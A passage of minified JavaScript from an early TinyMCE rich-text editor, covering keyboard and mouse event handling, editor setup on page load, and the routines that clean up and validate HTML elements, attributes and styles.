false;}}if(tinyMCE.isGecko&&tinyMCE.settings['force_p_newlines']&&(e.keyCode==8||e.keyCode==46)&&!e.shiftKey){if(tinyMCE.selectedInstance._handleBackSpace(e.type)){tinyMCE.execCommand("mceAddUndoLevel");e.preventDefault();return false;}}if(tinyMCE.isGecko&&(e.ctrlKey&&!e.altKey)&&tinyMCE.settings['custom_undo_redo']){if(tinyMCE.settings['custom_undo_redo_keyboard_shortcuts']){if(e.charCode==122){tinyMCE.selectedInstance.execCommand("Undo");e.preventDefault();return false;}if(e.charCode==121){tinyMCE.selectedInstance.execCommand("Redo");e.preventDefault();return false;}}if(e.charCode==98){tinyMCE.selectedInstance.execCommand("Bold");e.preventDefault();return false;}if(e.charCode==105){tinyMCE.selectedInstance.execCommand("Italic");e.preventDefault();return false;}if(e.charCode==117){tinyMCE.selectedInstance.execCommand("Underline");e.preventDefault();return false;}}if(tinyMCE.isMSIE&&tinyMCE.settings['force_br_newlines']&&e.keyCode==13){if(e.target.editorId)tinyMCE.selectedInstance=tinyMCE.instances[e.target.editorId];if(tinyMCE.selectedInstance){var sel=tinyMCE.selectedInstance.getDoc().selection;var rng=sel.createRange();if(tinyMCE.getParentElement(rng.parentElement(),"li")!=null)return false;e.returnValue=false;e.cancelBubble=true;rng.pasteHTML("<br />");rng.collapse(false);rng.select();tinyMCE.execCommand("mceAddUndoLevel");tinyMCE.triggerNodeChange(false);return false;}}if(e.keyCode==8||e.keyCode==46){tinyMCE.selectedElement=e.target;tinyMCE.linkElement=tinyMCE.getParentElement(e.target,"a");tinyMCE.imgElement=tinyMCE.getParentElement(e.target,"img");tinyMCE.triggerNodeChange(false);}return false;break;case "keyup":case "keydown":if(e.target.editorId)tinyMCE.selectedInstance=tinyMCE.instances[e.target.editorId];else return;if(tinyMCE.selectedInstance)tinyMCE.selectedInstance.switchSettings();var inst=tinyMCE.selectedInstance;if(tinyMCE.isGecko&&tinyMCE.settings['force_p_newlines']&&(e.keyCode==8||e.keyCode==46)&&!e.shiftKey){if(tinyMCE.selectedInstance._handleBackSpace(e.type)){tinyMCE.execCommand("mceAddUndoLevel");e.preventDefault();return false;}}tinyMCE.selectedElement=null;tinyMCE.selectedNode=null;var elm=tinyMCE.selectedInstance.getFocusElement();tinyMCE.linkElement=tinyMCE.getParentElement(elm,"a");tinyMCE.imgElement=tinyMCE.getParentElement(elm,"img");tinyMCE.selectedElement=elm;if(tinyMCE.isGecko&&e.type=="keyup"&&e.keyCode==9)tinyMCE.handleVisualAid(tinyMCE.selectedInstance.getBody(),true,tinyMCE.settings['visual'],tinyMCE.selectedInstance);if(tinyMCE.isGecko&&tinyMCE.settings['document_base_url']!=""+document.location.href&&e.type=="keyup"&&e.ctrlKey&&e.keyCode==86)tinyMCE.selectedInstance.fixBrokenURLs();if(tinyMCE.isMSIE&&e.type=="keydown"&&e.keyCode==13)tinyMCE.enterKeyElement=tinyMCE.selectedInstance.getFocusElement();if(tinyMCE.isMSIE&&e.type=="keyup"&&e.keyCode==13){var elm=tinyMCE.enterKeyElement;if(elm){var re=new RegExp('^HR|IMG|BR$','g');var dre=new RegExp('^H[1-6]$','g');if(!elm.hasChildNodes()&&!re.test(elm.nodeName)){if(dre.test(elm.nodeName))elm.innerHTML=" ";else elm.innerHTML=" ";}}}var keys=tinyMCE.posKeyCodes;var posKey=false;for(var i=0;i<keys.length;i++){if(keys[i]==e.keyCode){posKey=true;break;}}if(tinyMCE.isMSIE&&tinyMCE.settings['custom_undo_redo']){var keys=new Array(8,46);for(var i=0;i<keys.length;i++){if(keys[i]==e.keyCode){if(e.type=="keyup")tinyMCE.triggerNodeChange(false);}}if(tinyMCE.settings['custom_undo_redo_keyboard_shortcuts']){if(e.keyCode==90&&(e.ctrlKey&&!e.altKey)&&e.type=="keydown"){tinyMCE.selectedInstance.execCommand("Undo");tinyMCE.triggerNodeChange(false);}if(e.keyCode==89&&(e.ctrlKey&&!e.altKey)&&e.type=="keydown"){tinyMCE.selectedInstance.execCommand("Redo");tinyMCE.triggerNodeChange(false);}if((e.keyCode==90||e.keyCode==89)&&(e.ctrlKey&&!e.altKey)){e.returnValue=false;e.cancelBubble=true;return false;}}}if(!posKey&&e.type=="keyup")tinyMCE.execCommand("mceStartTyping");if(e.type=="keyup"&&(posKey||e.ctrlKey))tinyMCE.execCommand("mceEndTyping");if(posKey&&e.type=="keyup")tinyMCE.triggerNodeChange(false);if(tinyMCE.isMSIE&&e.ctrlKey)window.setTimeout('tinyMCE.triggerNodeChange(false);',1);break;case "mousedown":case "mouseup":case "click":case "focus":if(tinyMCE.selectedInstance)tinyMCE.selectedInstance.switchSettings();var targetBody=tinyMCE.getParentElement(e.target,"body");for(var instanceName in tinyMCE.instances){if(!tinyMCE.isInstance(tinyMCE.instances[instanceName]))continue;var inst=tinyMCE.instances[instanceName];inst.autoResetDesignMode();if(inst.getBody()==targetBody){tinyMCE.selectedInstance=inst;tinyMCE.selectedElement=e.target;tinyMCE.linkElement=tinyMCE.getParentElement(tinyMCE.selectedElement,"a");tinyMCE.imgElement=tinyMCE.getParentElement(tinyMCE.selectedElement,"img");break;}}if(tinyMCE.isSafari){tinyMCE.selectedInstance.lastSafariSelection=tinyMCE.selectedInstance.getBookmark();tinyMCE.selectedInstance.lastSafariSelectedElement=tinyMCE.selectedElement;var lnk=tinyMCE.getParentElement(tinyMCE.selectedElement,"a");if(lnk&&e.type=="mousedown"){lnk.setAttribute("mce_real_href",lnk.getAttribute("href"));lnk.setAttribute("href","javascript:void(0);");}if(lnk&&e.type=="click"){window.setTimeout(function(){lnk.setAttribute("href",lnk.getAttribute("mce_real_href"));lnk.removeAttribute("mce_real_href");},10);}}if(e.type!="focus")tinyMCE.selectedNode=null;tinyMCE.triggerNodeChange(false);tinyMCE.execCommand("mceEndTyping");if(e.type=="mouseup")tinyMCE.execCommand("mceAddUndoLevel");if(!tinyMCE.selectedInstance&&e.target.editorId)tinyMCE.selectedInstance=tinyMCE.instances[e.target.editorId];if(tinyMCE.isGecko&&tinyMCE.settings['document_base_url']!=""+document.location.href)window.setTimeout('tinyMCE.getInstanceById("'+inst.editorId+'").fixBrokenURLs();',10);return false;break;}};TinyMCE.prototype.switchClass=function(element,class_name,lock_state){var lockChanged=false;if(typeof(lock_state)!="undefined"&&element!=null){element.classLock=lock_state;lockChanged=true;}if(element!=null&&(lockChanged||!element.classLock)){element.oldClassName=element.className;element.className=class_name;}};TinyMCE.prototype.restoreAndSwitchClass=function(element,class_name){if(element!=null&&!element.classLock){this.restoreClass(element);this.switchClass(element,class_name);}};TinyMCE.prototype.switchClassSticky=function(element_name,class_name,lock_state){var element,lockChanged=false;if(!this.stickyClassesLookup[element_name])this.stickyClassesLookup[element_name]=document.getElementById(element_name);element=this.stickyClassesLookup[element_name];if(typeof(lock_state)!="undefined"&&element!=null){element.classLock=lock_state;lockChanged=true;}if(element!=null&&(lockChanged||!element.classLock)){element.className=class_name;element.oldClassName=class_name;if(tinyMCE.isOpera){if(class_name=="mceButtonDisabled"){var suffix="";if(!element.mceOldSrc)element.mceOldSrc=element.src;if(this.operaOpacityCounter>-1)suffix='?rnd='+this.operaOpacityCounter++;element.src=tinyMCE.baseURL+"/themes/"+tinyMCE.getParam("theme")+"/images/opacity.png"+suffix;element.style.backgroundImage="url('"+element.mceOldSrc+"')";}else{if(element.mceOldSrc){element.src=element.mceOldSrc;element.parentNode.style.backgroundImage="";element.mceOldSrc=null;}}}}};TinyMCE.prototype.restoreClass=function(element){if(element!=null&&element.oldClassName&&!element.classLock){element.className=element.oldClassName;element.oldClassName=null;}};TinyMCE.prototype.setClassLock=function(element,lock_state){if(element!=null)element.classLock=lock_state;};TinyMCE.prototype.addEvent=function(obj,name,handler){if(tinyMCE.isMSIE){obj.attachEvent("on"+name,handler);}else obj.addEventListener(name,handler,false);};TinyMCE.prototype.submitPatch=function(){tinyMCE.removeTinyMCEFormElements(this);tinyMCE.triggerSave();this.mceOldSubmit();tinyMCE.isNotDirty=true;};TinyMCE.prototype.onLoad=function(){for(var c=0;c<tinyMCE.configs.length;c++){tinyMCE.settings=tinyMCE.configs[c];var selector=tinyMCE.getParam("editor_selector");var deselector=tinyMCE.getParam("editor_deselector");var elementRefAr=new Array();if(document.forms&&tinyMCE.settings['add_form_submit_trigger']&&!tinyMCE.submitTriggers){for(var i=0;i<document.forms.length;i++){var form=document.forms[i];tinyMCE.addEvent(form,"submit",TinyMCE.prototype.handleEvent);tinyMCE.addEvent(form,"reset",TinyMCE.prototype.handleEvent);tinyMCE.submitTriggers=true;if(tinyMCE.settings['submit_patch']){try{form.mceOldSubmit=form.submit;form.submit=TinyMCE.prototype.submitPatch;}catch(e){}}}}var mode=tinyMCE.settings['mode'];switch(mode){case "exact":var elements=tinyMCE.getParam('elements','',true,',');for(var i=0;i<elements.length;i++){var element=tinyMCE._getElementById(elements[i]);var trigger=element?element.getAttribute(tinyMCE.settings['textarea_trigger']):"";if(tinyMCE.getAttrib(element,"class").indexOf(deselector)!=-1)continue;if(trigger=="false")continue;if(tinyMCE.settings['ask']&&element){elementRefAr[elementRefAr.length]=element;continue;}if(element)tinyMCE.addMCEControl(element,elements[i]);else if(tinyMCE.settings['debug'])alert("Error: Could not find element by id or name: "+elements[i]);}break;case "specific_textareas":case "textareas":var nodeList=document.getElementsByTagName("textarea");for(var i=0;i<nodeList.length;i++){var elm=nodeList.item(i);var trigger=elm.getAttribute(tinyMCE.settings['textarea_trigger']);if(selector!=''&&tinyMCE.getAttrib(elm,"class").indexOf(selector)==-1)continue;if(tinyMCE.getAttrib(elm,"class").indexOf(deselector)!=-1)continue;if((mode=="specific_textareas"&&trigger=="true")||(mode=="textareas"&&trigger!="false"))elementRefAr[elementRefAr.length]=elm;}break;}for(var i=0;i<elementRefAr.length;i++){var element=elementRefAr[i];var elementId=element.name?element.name:element.id;if(tinyMCE.settings['ask']){if(tinyMCE.isGecko){var settings=tinyMCE.settings;tinyMCE.addEvent(element,"focus",function(e){window.setTimeout(function(){TinyMCE.prototype.confirmAdd(e,settings);},10);});}else{var settings=tinyMCE.settings;tinyMCE.addEvent(element,"focus",function(){TinyMCE.prototype.confirmAdd(null,settings);});}}else tinyMCE.addMCEControl(element,elementId);}if(tinyMCE.settings['auto_focus']){window.setTimeout(function(){var inst=tinyMCE.getInstanceById(tinyMCE.settings['auto_focus']);inst.selectNode(inst.getBody(),true,true);inst.contentWindow.focus();},10);}tinyMCE.executeCallback('oninit','_oninit',0);}};TinyMCE.prototype.removeMCEControl=function(editor_id){var inst=tinyMCE.getInstanceById(editor_id);if(inst){inst.switchSettings();editor_id=inst.editorId;var html=tinyMCE.getContent(editor_id);var tmpInstances=new Array();for(var instanceName in tinyMCE.instances){var instance=tinyMCE.instances[instanceName];if(!tinyMCE.isInstance(instance))continue;if(instanceName!=editor_id)tmpInstances[instanceName]=instance;}tinyMCE.instances=tmpInstances;tinyMCE.selectedElement=null;tinyMCE.selectedInstance=null;var replaceElement=document.getElementById(editor_id+"_parent");var oldTargetElement=inst.oldTargetElement;var targetName=oldTargetElement.nodeName.toLowerCase();if(targetName=="textarea"||targetName=="input"){replaceElement.parentNode.removeChild(replaceElement);oldTargetElement.style.display="inline";oldTargetElement.value=html;}else{oldTargetElement.innerHTML=html;replaceElement.parentNode.insertBefore(oldTargetElement,replaceElement);replaceElement.parentNode.removeChild(replaceElement);}}};TinyMCE.prototype._cleanupElementName=function(element_name,element){var name="";element_name=element_name.toLowerCase();if(element_name=="body")return null;if(tinyMCE.cleanup_verify_html){for(var i=0;i<tinyMCE.cleanup_invalidElements.length;i++){if(tinyMCE.cleanup_invalidElements[i]==element_name)return null;}var validElement=false;var elementAttribs=null;for(var i=0;i<tinyMCE.cleanup_validElements.length&&!elementAttribs;i++){for(var x=0,n=tinyMCE.cleanup_validElements[i][0].length;x<n;x++){var elmMatch=tinyMCE.cleanup_validElements[i][0][x];if(elmMatch.charAt(0)=='+'||elmMatch.charAt(0)=='-')elmMatch=elmMatch.substring(1);if(elmMatch.match(new RegExp('\\*|\\?|\\+','g'))!=null){elmMatch=elmMatch.replace(new RegExp('\\?','g'),'(\\S?)');elmMatch=elmMatch.replace(new RegExp('\\+','g'),'(\\S+)');elmMatch=elmMatch.replace(new RegExp('\\*','g'),'(\\S*)');elmMatch="^"+elmMatch+"$";if(element_name.match(new RegExp(elmMatch,'g'))){elementAttribs=tinyMCE.cleanup_validElements[i];validElement=true;break;}}if(element_name==elmMatch){elementAttribs=tinyMCE.cleanup_validElements[i];validElement=true;element_name=elementAttribs[0][0];break;}}}if(!validElement)return null;}if(element_name.charAt(0)=='+'||element_name.charAt(0)=='-')name=element_name.substring(1);if(!tinyMCE.isMSIE){if(name=="strong"&&!tinyMCE.cleanup_on_save)element_name="b";else if(name=="em"&&!tinyMCE.cleanup_on_save)element_name="i";}var elmData=new Object();elmData.element_name=element_name;elmData.valid_attribs=elementAttribs;return elmData;};TinyMCE.prototype._moveStyle=function(elm,style,attrib){if(tinyMCE.cleanup_inline_styles){var val=tinyMCE.getAttrib(elm,attrib);if(val!=''){val=''+val;switch(attrib){case "background":val="url('"+val+"');";break;case "bordercolor":if(elm.style.borderStyle==''||elm.style.borderStyle=='none')elm.style.borderStyle='solid';break;case "border":case "width":case "height":if(attrib=="border"&&elm.style.borderWidth>0)return;if(val.indexOf('%')==-1)val+='px';break;case "vspace":case "hspace":elm.style.marginTop=val+"px";elm.style.marginBottom=val+"px";elm.removeAttribute(attrib);return;case "align":if(elm.nodeName=="IMG"){if(tinyMCE.isMSIE)elm.style.styleFloat=val;else elm.style.cssFloat=val;}else elm.style.textAlign=val;elm.removeAttribute(attrib);return;}if(val!=''){eval('elm.style.'+style+' = val;');elm.removeAttribute(attrib);}}}else{if(style=='')return;var val=eval('elm.style.'+style)==''?tinyMCE.getAttrib(elm,attrib):eval('elm.style.'+style);val=val==null?'':''+val;switch(attrib){case "background":if(val.indexOf('url')==-1&&val!='')val="url('"+val+"');";if(val!=''){elm.style.backgroundImage=val;elm.removeAttribute(attrib);}return;case "border":case "width":case "height":val=val.replace('px','');break;case "align":if(tinyMCE.getAttrib(elm,'align')==''){if(elm.nodeName=="IMG"){if(tinyMCE.isMSIE&&elm.style.styleFloat!=''){val=elm.style.styleFloat;style='styleFloat';}else if(tinyMCE.isGecko&&elm.style.cssFloat!=''){val=elm.style.cssFloat;style='cssFloat';}}}break;}if(val!=''){elm.removeAttribute(attrib);elm.setAttribute(attrib,val);eval('elm.style.'+style+' = "";');}}};TinyMCE.prototype._cleanupAttribute=function(valid_attributes,element_name,attribute_node,element_node){var attribName=attribute_node.nodeName.toLowerCase();var attribValue=attribute_node.nodeValue;var attribMustBeValue=null;var verified=false;if(attribName.indexOf('moz_')!=-1)return null;if(!tinyMCE.isMSIE&&(attribName=="mce_real_href"||attribName=="mce_real_src")){if(!tinyMCE.cleanup_on_save){var attrib=new Object();attrib.name=attribName;attrib.value=attribValue;return attrib;}else return null;}if(tinyMCE.cleanup_verify_html&&!verified){for(var i=1;i<valid_attributes.length;i++){var attribMatch=valid_attributes[i][0];var re=null;if(attribMatch.match(new RegExp('\\*|\\?|\\+','g'))!=null){attribMatch=attribMatch.replace(new RegExp('\\?','g'),'(\\S?)');attribMatch=attribMatch.replace(new RegExp('\\+','g'),'(\\S+)');attribMatch=attribMatch.replace(new RegExp('\\*','g'),'(\\S*)');attribMatch="^"+attribMatch+"$";re=new RegExp(attribMatch,'g');}if((re&&attribName.match(re)!=null)||attribName==attribMatch){verified=true;attribMustBeValue=valid_attributes[i][3];break;}}if(!verified)return false;}else verified=true;switch(attribName){case "size":if(tinyMCE.isMSIE5&&element_name=="font")attribValue=element_node.size;break;case "width":case "height":case "border":if(tinyMCE.isMSIE5)attribValue=eval("element_node."+attribName);break;case "shape":attribValue=attribValue.toLowerCase();break;case "cellspacing":if(tinyMCE.isMSIE5)attribValue=element_node.cellSpacing;break;case "cellpadding":if(tinyMCE.isMSIE5)attribValue=element_node.cellPadding;break;case "color":if(tinyMCE.isMSIE5&&element_name=="font")attribValue=element_node.color;break;case "class":if(tinyMCE.cleanup_on_save&&attribValue.indexOf('mceItemAnchor')!=-1)attribValue=attribValue.replace(/mceItem[a-z0-9]+/gi,'');if(element_name=="table"||element_name=="td"){if(tinyMCE.cleanup_visual_table_class!="")attribValue=tinyMCE.getVisualAidClass(attribValue,!tinyMCE.cleanup_on_save);}if(!tinyMCE._verifyClass(element_node)||attribValue=="")return null;break;case "onfocus":case "onblur":case "onclick":case "ondblclick":case "onmousedown":case "onmouseup":case "onmouseover":case "onmousemove":case "onmouseout":case "onkeypress":case "onkeydown":case "onkeydown":case "onkeyup":attribValue=tinyMCE.cleanupEventStr(""+attribValue);if(attribValue.indexOf('return false;')==0)attribValue=attribValue.substring(14);break;case "style":attribValue=tinyMCE.serializeStyle(tinyMCE.parseStyle(tinyMCE.getAttrib(element_node,"style")));break;case "href":case "src":if(tinyMCE.isGecko18&&attribName=="src")attribValue=element_node.src;if(!tinyMCE.isMSIE&&attribName=="href"&&element_node.getAttribute("mce_real_href"))attribValue=element_node.getAttribute("mce_real_href");if(!tinyMCE.isMSIE&&attribName=="src"&&element_node.getAttribute("mce_real_src"))attribValue=element_node.getAttribute("mce_real_src");if(tinyMCE.isGecko&&!tinyMCE.getParam('relative_urls'))attribValue=tinyMCE.convertRelativeToAbsoluteURL(tinyMCE.settings['base_href'],attribValue);attribValue=eval(tinyMCE.cleanup_urlconverter_callback+"(attribValue, element_node, tinyMCE.cleanup_on_save);");break;case "colspan":case "rowspan":if(attribValue=="1")return null;break;case "_moz-userdefined":case "editorid":case "mce_real_href":case "mce_real_src":return null;}if(attribMustBeValue!=null){var isCorrect=false;for(var i=0;i<attribMustBeValue.length;i++){if(attribValue==attribMustBeValue[i]){isCorrect=true;break;}}if(!isCorrect)return null;}var attrib=new Object();attrib.name=attribName;attrib.value=attribValue;return attrib;};TinyMCE.prototype.clearArray=function(ar){for(var key in ar)ar[key]=null;};TinyMCE.prototype.isInstance=function(inst){return inst!=null&&typeof(inst)=="object"&&inst.isTinyMCEControl;};TinyMCE.prototype.parseStyle=function(str){var ar=new Array();if(str==null)return ar;var st=str.split(';');tinyMCE.clearArray(ar);for(var i=0;i<st.length;i++){if(st[i]=='')continue;var re=new RegExp('^\\s*([^:]*):\\s*(.*)\\s*$');var pa=st[i].replace(re,'$1||$2').split('||');if(pa.length==2)ar[pa[0].toLowerCase()]=pa[1];}return ar;};TinyMCE.prototype.compressStyle=function(ar,pr,sf,res){var box=new Array();box[0]=ar[pr+'-top'+sf];box[1]=ar[pr+'-left'+sf];box[2]=ar[pr+'-right'+sf];box[3]=ar[pr+'-bottom'+sf];for(var i=0;i<box.length;i++){if(box[i]==null)return;for(var a=0;a<box.length;a++){if(box[a]!=box[i])return;}}ar[res]=box[0];ar[pr+'-top'+sf]=null;ar[pr+'-left'+sf]=null;ar[pr+'-right'+sf]=null;ar[pr+'-bottom'+sf]=null;};TinyMCE.prototype.serializeStyle=function(ar){var str="";tinyMCE.compressStyle(ar,"border","","border");tinyMCE.compressStyle(ar,"border","-width","border-width");tinyMCE.compressStyle(ar,"border","-color","border-color");for(var key in ar){var val=ar[key];if(typeof(val)=='function')continue;if(val!=null&&val!=''){val=''+val;val=val.replace(new RegExp("url\\(\\'?([^\\']*)\\'?\\)",'gi'),"url('$1')");if(tinyMCE.getParam("force_hex_style_colors"))val=tinyMCE.convertRGBToHex(val);if(val!="url('')")str+=key.toLowerCase()+": "+val+"; ";}}if(new RegExp('; $').test(str))str=str.substring(0,str.length-2);return str;};TinyMCE.prototype.convertRGBToHex=function(s){if(s.toLowerCase().indexOf('rgb')!=-1){var re=new RegExp("rgb\\s*\\(\\s*([0-9]+).*,\\s*([0-9]+).*,\\s*([0-9]+).*\\)","gi");var rgb=s.replace(re,"$1,$2,$3").split(',');if(rgb.length==3){r=parseInt(rgb[0]).toString(16);g=parseInt(rgb[1]).toString(16);b=parseInt(rgb[2]).toString(16);r=r.length==1?'0'+r:r;g=g.length==1?'0'+g:g;b=b.length==1?'0'+b:b;s="#"+r+g+b;}}return s;};TinyMCE.prototype._verifyClass=function(node){if(tinyMCE.isGecko){var className=node.getAttribute('class');if(!className)return false;}if(tinyMCE.isMSIE)var className=node.getAttribute('className');if(tinyMCE.cleanup_verify_css_classes&&tinyMCE.cleanup_on_save){var csses=tinyMCE.getCSSClasses();nonDefinedCSS=true;for(var c=0;c<csses.length;c++){if(csses[c]==className){nonDefinedCSS=false;break;}}if(nonDefinedCSS&&className.indexOf('mce_')!=0){node.removeAttribute('className');node.removeAttribute('class');return false;}}return true;};TinyMCE.prototype.cleanupNode=function(node){var output="";switch(node.nodeType){case 1:var elementData=tinyMCE._cleanupElementName(node.nodeName,node);var elementName=elementData?elementData.element_name:null;var elementValidAttribs=elementData?elementData.valid_attribs:null;var elementAttribs="";var openTag=false,nonEmptyTag=false;if(elementName!=null&&elementName.charAt(0)=='+'){elementName=elementName.substring(1);openTag=true;}if(elementName!=null&&elementName.charAt(0)=='-'){elementName=elementName.substring(1);nonEmptyTag=true;}if(tinyMCE.isMSIE&&tinyMCE.settings['fix_content_duplication']){var lookup=tinyMCE.cleanup_elementLookupTable;for(var i=0;i<lookup.length;i++){if(lookup[i]==node)return output;}lookup[lookup.length]=node;}if(!elementName){if(node.hasChildNodes()){for(var i=0;i<node.childNodes.length;i++)output+=this.cleanupNode(node.childNodes[i]);}return output;}if(tinyMCE.cleanup_on_save){if(node.nodeName=="A"&&node.className=="mceItemAnchor"){if(node.hasChildNodes()){for(var i=0;i<node.childNodes.length;i++)output+=this.cleanupNode(node.childNodes[i]);}return '<a name="'+this.convertStringToXML(node.getAttribute("name"))+'"></a>'+output;}}var re=new RegExp("^(TABLE|TD|TR)$");if(re.test(node.nodeName)){if((node.nodeName!="TABLE"||tinyMCE.cleanup_inline_styles)&&(width=tinyMCE.getAttrib(node,"width"))!=''){node.style.width=width.indexOf('%')!=-1?width:width.replace(/[^0-9]/gi,'')+"px";node.removeAttribute("width");}if((node.nodeName=="TABLE"&&!tinyMCE.cleanup_inline_styles)&&node.style.width!=''){tinyMCE.setAttrib(node,"width",node.style.width.replace('px',''));node.style.width='';}if((height=tinyMCE.getAttrib(node,"height"))!=''){node.style.height=height.indexOf('%')!=-1?height:height.replace(/[^0-9]/gi,'')+"px";node.removeAttribute("height");}}if(tinyMCE.cleanup_inline_styles){var re=new RegExp("^(TABLE|TD|TR|IMG|HR)$");if(re.test(node.nodeName)){tinyMCE._moveStyle(node,'width','width');tinyMCE._moveStyle(node,'height','height');tinyMCE._moveStyle(node,'borderWidth','border');tinyMCE._moveStyle(node,'','vspace');tinyMCE._moveStyle(node,'','hspace');tinyMCE._moveStyle(node,'textAlign','align');tinyMCE._moveStyle(node,'backgroundColor','bgColor');tinyMCE._moveStyle(node,'borderColor','borderColor');tinyMCE._moveStyle(node,'backgroundImage','background');if(tinyMCE.isMSIE5)node.outerHTML=node.outerHTML;}else if(tinyMCE.isBlockElement(node))tinyMCE._moveStyle(node,'textAlign','align');if(node.nodeName=="FONT")tinyMCE._moveStyle(node,'color','color');}if(elementValidAttribs){for(var a=1;a<elementValidAttribs.length;a++){var attribName,attribDefaultValue,attribForceValue,attribValue;attribName=elementValidAttribs[a][0];attribDefaultValue=elementValidAttribs[a][1];attribForceValue=elementValidAttribs[a][2];if(attribDefaultValue!=null||attribForceValue!=null){var attribValue=node.getAttribute(attribName);if(node.getAttribute(attribName)==null||node.getAttribute(attribName)=="")attribValue=attribDefaultValue;attribValue=attribForceValue?attribForceValue:attribValue;if(attribValue=="{$uid}")attribValue="uid_"+(tinyMCE.cleanup_idCount++);if(attribName=="class")attribValue=tinyMCE.getVisualAidClass(attribValue,tinyMCE.cleanup_on_save);node.setAttribute(attribName,attribValue);}}}if((tinyMCE.isMSIE&&!tinyMCE.isOpera)&&elementName=="style")return "<style>"+node.innerHTML+"</style>";if(elementName=="table"&&!node.hasChildNodes())return "";if(node.attributes.length>0){var lastAttrib="";for(var i=0;i<node.attributes.length;i++){if(node.attributes[i].specified){if(tinyMCE.isOpera){if(node.attributes[i].nodeName==lastAttrib)continue;lastAttrib=node.attributes[i].nodeName;}var attrib=tinyMCE._cleanupAttribute(elementValidAttribs,elementName,node.attributes[i],node);if(attrib&&attrib.value!="")elementAttribs+=" "+attrib.name+"="+'"'+this.convertStringToXML(""+attrib.value)+'"';}}}if(tinyMCE.isMSIE&&elementName=="table"&&node.getAttribute("summary")!=null&&elementAttribs.indexOf('summary')==-1){var summary=tinyMCE.getAttrib(node,'summary');if(summary!='')elementAttribs+=" summary="+'"'+this.convertStringToXML(summary)+'"';}if(tinyMCE.isMSIE5&&/^(td|img|a)$/.test(elementName)){var ma=new Array("scope","longdesc","hreflang","charset","type");for(var u=0;u<ma.length;u++){if(node.getAttribute(ma[u])!=null){var s=tinyMCE.getAttrib(node,ma[u]);if(s!='')elementAttribs+=" "+ma[u]+"="+'"'+this.convertStringToXML(s)+'"';}}}if(tinyMCE.isMSIE&&elementName=="input"){if(node.type){if(!elementAttribs.match(/type=/g))elementAttribs+=" type="+'"'+node.type+'"';}if(node.value){if(!elementAttribs.match(/value=/g))elementAttribs+=" value="+'"'+node.value+'"';}}if((elementName=="p"||elementName=="td")&&(node.innerHTML==""||node.innerHTML==" "))return "<"+elementName+elementAttribs+">"+this.convertStringToXML(String.fromCharCode(160))+"</"+elementName+">";if(tinyMCE.isMSIE&&elementName=="script")return "<"+elementName+elementAttribs+">"+node.text+"</"+elementName+">";if(node.hasChildNodes()){if(!(elementName=="span"&&elementAttribs==""&&tinyMCE.getParam("trim_span_elements"))){if(elementName=="p"&&tinyMCE.cleanup_force_br_newlines)output+="<div"+elementAttribs+">";else output+="<"+elementName+elementAttribs+">";}for(var i=0;i<node.childNodes.length;i++)output+=this.cleanupNode(node.childNodes[i]);if(!(elementName=="span"&&elementAttribs==""&&tinyMCE.getParam("trim_span_elements"))){if(elementName=="p"&&tinyMCE.cleanup_force_br_newlines)output+="</div><br />";else output+="</"+elementName+">";}}else{if(!nonEmptyTag){if(openTag)output+="<"+elementName+elementAttribs+"></"+elementName+">";else output+="<"+elementName+elementAttribs+" />";}}return output;case 3:if(node.parentNode.nodeName=="SCRIPT"||node.parentNode.nodeName=="STYLE")return node.nodeValue;return this.convertStringToXML(node.nodeValue);case 8:return "<!--"+node.nodeValue+"-->";default:return "[UNKNOWN NODETYPE "+node.nodeType+"]";}};TinyMCE.prototype.convertStringToXML=function(html_data){var output="";for(var i=0;i<html_data.length;i++){var chr=html_data.charCodeAt(i);if(tinyMCE.settings['entity_encoding']=="numeric"){if(chr>127)output+='&#'+chr+";";else output+=String.fromCharCode(chr);continue;}if(tinyMCE.settings['entity_encoding']=="raw"){output+=String.fromCharCode(chr);continue;}if(typeof(tinyMCE.cleanup_entities["c"+chr])!='undefined'&&tinyMCE.cleanup_entities["c"+chr]!='')output+='&'+tinyMCE.cleanup_entities["c"+chr]+';';else output+=''+String.fromCharCode(chr);}return output;};TinyMCE.prototype._getCleanupElementName=function(chunk){var pos;if(chunk.charAt(0)=='+')chunk=chunk.substring(1);if(chunk.charAt(0)=='-')chunk=chunk.substring(1);if((pos=chunk.indexOf('/'))!=-1)chunk=chunk.substring(0,pos);if((pos=chunk.indexOf('['))!=-1)chunk=chunk.substring(0,pos);return chunk;};TinyMCE.prototype._initCleanup=function(){var validElements=tinyMCE.settings["valid_elements"];validElements=validElements.split(',');var extendedValidElements=tinyMCE.settings["extended_valid_elements"];extendedValidElements=extendedValidElements.split(',');for(var i=0;i<extendedValidElements.length;i++){var elementName=this._getCleanupElementName(extendedValidElements[i]);var skipAdd=false;for(var x=0;x<validElements.length;x++){if(this._getCleanupElementName(validElements[x])==elementName){validElements[x]=extendedValidElements[i];skipAdd=true;break;}}if(!skipAdd)validElements[validElements.length]=extendedValidElements[i];}for(var i=0;i<validElements.length;i++){var item=validElements[i];item=item.replace('[','|');item=item.replace(']','');var attribs=item.split('|');for(var x=0;x<attribs.length;x++)attribs[x]=attribs[x].toLowerCase();attribs[0]=attribs[0].split('/');for(var x=1;x<attribs.length;x++){var attribName=attribs[x];var attribDefault=null;var attribForce=null;var attribMustBe=null;if((pos=attribName.indexOf('='))!=-1){attribDefault=attribName.substring(pos+1);attribName=attribName.substring(0,pos);}if((pos=attribName.indexOf(':'))!=-1){attribForce=attribName.substring(pos+1);attribName=attribName.substring(0,pos);}if((pos=attribName.indexOf('<'))!=-1){attribMustBe=attribName.substring(pos+1).split('?');attribName=attribName.substring(0,pos);}attribs[x]=new Array(attribName,attribDefault,attribForce,attribMustBe);}validElements[i]=attribs;}var invalidElements=tinyMCE.settings['invalid_elements'].split(',');for(var i=0;i<invalidElements.length;i++)invalidElements[i]=invalidElements[i].toLowerCase();tinyMCE.settings['cleanup_validElements']=validElements;tinyMCE.settings['cleanup_invalidElements']=invalidElements;tinyMCE.settings['cleanup_entities']=new Array();var entities=tinyMCE.getParam('entities','',true,',');for(var i=0;i<entities.length;i+=2)tinyMCE.settings['cleanup_entities']['c'+entities[i]]=entities[i+1];};TinyMCE.prototype._cleanupHTML=function(inst,doc,config,element,visual,on_save){if(!tinyMCE.settings['cleanup'])return 